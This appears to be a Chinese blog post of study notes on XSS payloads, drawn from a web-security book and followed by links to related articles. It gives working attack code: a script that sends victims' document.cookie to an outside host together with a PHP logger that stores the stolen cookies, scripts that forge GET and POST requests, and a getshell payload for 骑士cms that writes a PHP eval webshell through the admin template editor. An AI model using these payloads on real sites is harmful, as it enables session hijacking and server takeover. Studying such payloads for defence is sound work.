xss payload可以使用富客户端文本书写,大多数用javascript,少部分用actionscript等等。

1.盗取cookie,发起cookie劫持

使用xss漏洞插入cookie.js

cookie.js代码:

1 var img = document.createElement("img");
2  
3 img.src = "http://lanu.sinaapp.com/cookie.php?cookie="+escape(document.cookie);
4  
5 document.body.appendChild(img);

cookie.php代码

1 <?php
2  
3     $file = fopen("cookie.txt","a");
4  
5     fwrite($file,$_GET['cookie']);
6  
7     fclose($file);
8  
9 ?>

2.构造GET和POST请求

get.js代码:

1 var img = document.createElement("img");
2  
3 img.src = "一个可以使用的get请求链接";
4  
5 document.body.appendChild(img);

post.js代码:

代码1:(DOM节点方式)

01 var f = document.createElement("form");
02  
03 f.action ="";
04  
05 f.method = "post";
06  
07 document.body.appendChild(f);
08  
09 var i1 = document.createElement("input");
10  
11 i1.name = "xxx";
12  
13 i1.value = "xxxx";
14  
15 f.appendChild(i1);
16  
17 var i2 = document.createElement("input");
18  
19 i2.name = "aaa";
20  
21 i2.value = "aaa";
22  
23 f.appendChild(i2);
24  
25 f.submit();

代码2:

1 var dd = document.createElement("div");
2  
3 document.body.appendChild(dd);
4  
5 dd.innerHTML ='<form action="" method="post" id="xssform" name="mbform">'+'<input type="hidden" value="xxxx" name="xxx" />'+'<input type="text" value="aaaa" name="aaa" />'+'</form>';
6  
7 document.getElementById("xssform").submit();

代码3:(使用XMLHttpRequest)

01 var url = "http://lanu.sinaapp.com";
02  
03 var postStr = "aaa=aaaa&xxx=xxxx";
04  
05 var ajax = null;
06  
07 if(window.XMLHttpRequest)
08  
09 {
10  
11     ajax = new XMLHttpRequest();
12  
13 }
14  
15 else if(window.ActiveXObject)
16  
17 {
18  
19     ajax = new ActiveXObject("Microsoft.XMLHTTP");//ie6和一下老版本
20  
21 }
22  
23 else
24  
25 {
26  
27     return;
28  
29 }
30  
31 ajax.open("POST", url , true);
32  
33 ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
34  
35 ajax.send(postStr);
36  
37 //ajax.open("GET", url, true);
38  
39 //ajax.send(null);
40  
41 ajax.onreadystatechange = function()
42  
43 {
44  
45     if(ajax.readyState == 4 && ajax.status == 200)
46  
47     {
48  
49         //alert("Done!");
50  
51     }
52  
53 }

-------------------

3.xss钓鱼

4.浏览器识别和用户安装软件识别

http://www.thespanner.co.uk/2009/01/29/detecting-browsers-javascript-hacks/

5.css history hack

http://ha.ckers.org/weird/CSS-history-hack.html

读《白帽子讲web安全》笔记

---------------------

xxs payload getshell 实例:

骑士cms getshell

01 //构造好的能写入一句话的连接
02  
03 var Shelldata='tpl_content=%3C%3Fphp%20eval%28%24_POST%5Bxdxd%5D%29%3F%3E&tpl_dir=default&tpl_name=footer.php&del_Submit=%B1%A3%B4%E6';
04  
05 try
06  
07 {
08  
09 //调用XMLHttpRequest
10     var xml = window.XMLHttpRequest ? (new XMLHttpRequest()) : (new ActiveXObject('Microsoft.XMLHTTP'));
11  
12     xml.open("POST",'admin_templates.php?act=do_edit',false);
13     xml.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
14     xml.onreadystatechange = function()
15     {
16         if(xml.readyState == 4)
17  
18         {
19  
20         }
21     }
22     xml.send(Shelldata);
23 }
24 catch(e)
25  
26 {
27  
28 }

xss payload的更多相关文章

  1. ES6中的模板字符串和新XSS Payload

    ES6中的模板字符串和新XSS Payload 众所周知,在XSS的实战对抗中,由于防守方经常会采用各种各样严格的过滤手段来过滤输入,所以我们使用的XSS Payload也会根据实际情况作出各种各样的 ...

  2. XSS Payload知识备忘

    参考资料:<白帽子讲Web安全>吴翰清 著 参见: 百度百科 http://baike.baidu.com/view/50325.htm 维基百科 http://zh.wikipedia. ...

  3. XSS payload 大全

    收集的一些XSS payload,主要分为五大类,便于查阅. #第一类:Javascript URL <a href="javascript:alert('test')"&g ...

  4. 1.8 收集的XSS Payload

    收集的XSS Payload ,可以做成字典,到时候批量测试:--------------------------------------------------------------------- ...

  5. Web安全系列(二):XSS 攻击进阶(初探 XSS Payload)

    什么是 XSS Payload 上一章我谈到了 XSS 攻击的几种分类以及形成的攻击的原理,并举了一些浅显的例子,接下来,我就阐述什么叫做 XSS Payload 以及从攻击者的角度来初探 XSS 攻 ...

  6. XSS Payload深入分析整理

    几种加载XSS Payload的不常见标签 众所周知,一种调用JavaScript的方法就是在元素类型上使用事件处理器(Event Handler),通常的一种方法类似: <img src=x ...

  7. 【命令汇总】XSS payload 速查表

    日期:2019-05-15 14:06:21 作者:Bay0net 介绍:收集并且可用的一些 XSS payload,网上的速查表很多,但是测试了下很多 payload 的不可用,这里都是自己能用的 ...

  8. xssless - 自动化的XSS payload攻击器

    XSSLESS 一个用Python编写的自动化XSS 负载(payload)攻击器 用法: 记录请求 并结合Burp proxy 选择你想生成的请求,然后右键选择“保存项目” 使用xssless生成你 ...

  9. xss payload大全

    刚好刚才在fuzz一个站的时候用到,就从笔记里抛出来了. code: (1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js> ...

随机推荐

  1. Pow(x, n)——这也能用二分法!!!!

    Implement pow(x, n). 下面介绍一下解决该问题的几种方法以及要注意的地方: 1)最直观容易想到的方法就是用递归方法求n个x的乘积,注意考虑n的正负号,时间复杂度为O(n) class ...

  2. Raspberry Pi Finder

    这是 meelo 原创的 玩转树莓派 系列文章 作为一名新手,你可能苦恼与如何寻找树莓派的IP地址.要想寻找IP地址,在不同的连接状况下,的方法是不一样的,这在其它教程里有作详细介绍(使用路由器连接树 ...

  3. AC日记——[HNOI2008]GT考试 bzoj 1009

    1009 思路: KMP上走DP(矩阵加速): DP[i][j]表示当前在第i位,同是匹配到不吉利串的第j位的方案数: 代码: #include <bits/stdc++.h> using ...

  4. Django2.x版本路由系统的正则写法以及视图函数的返回问题

    一.关于url.py urlpatterns每个元素的不再用url(),而是path(),最重要的一点是,正则的使用需要你自己手动导入re_path,并且在每个使用正则匹配的的元素用re_path() ...

  5. hdu 1874 畅通工程(spfa 邻接矩阵 邻接表)

    题目链接 畅通工程,可以用dijkstra算法实现. 听说spfa很好用,来水一发 邻接矩阵实现: #include <stdio.h> #include <algorithm> ...

  6. python中文转换url编码

    今天要处理百度贴吧的东西.想要做一个关键词的list,每次需要时,直接添加 到list里面就可以了.但是添加到list里面是中文的情况(比如‘丽江’),url的地址编码却是’%E4%B8%BD%E6% ...

  7. YII2 源码阅读 综述

    如何阅读源码呢? 我的方法是,打开xdebug的auto_trace [XDebug] ;xdebug.profiler_append = 0 ;xdebug.profiler_enable = 1 ...

  8. vue中keep-alive

    vue2.0提供了一个keep-alive组件用来缓存组件,避免多次加载相应的组件,减少性能消耗 1.基本用法,缓存整个页面或组件 <keep-alive> <component&g ...

  9. 洛谷——P1994 有机物燃烧

    P1994 有机物燃烧 题目背景 本来准备弄难点的,还是算了吧 题目描述 输入一种有机物,输出与氧气反应化学方程式中CO2和H2O的系数 输入输出格式 输入格式: 一行,一个字符串,表示有机物 输出格 ...

  10. 使用html+css实现三角标示符号

    我们平常打开某个网站的时候,常常会发现网页上很多导航或者指示条会使用一个三角符号去指向内容,效果简洁美观,甚至很多前端面试中也会提及如何在网页上实现一个三角符号,这里给出一个很简单使用的实现方式. 首 ...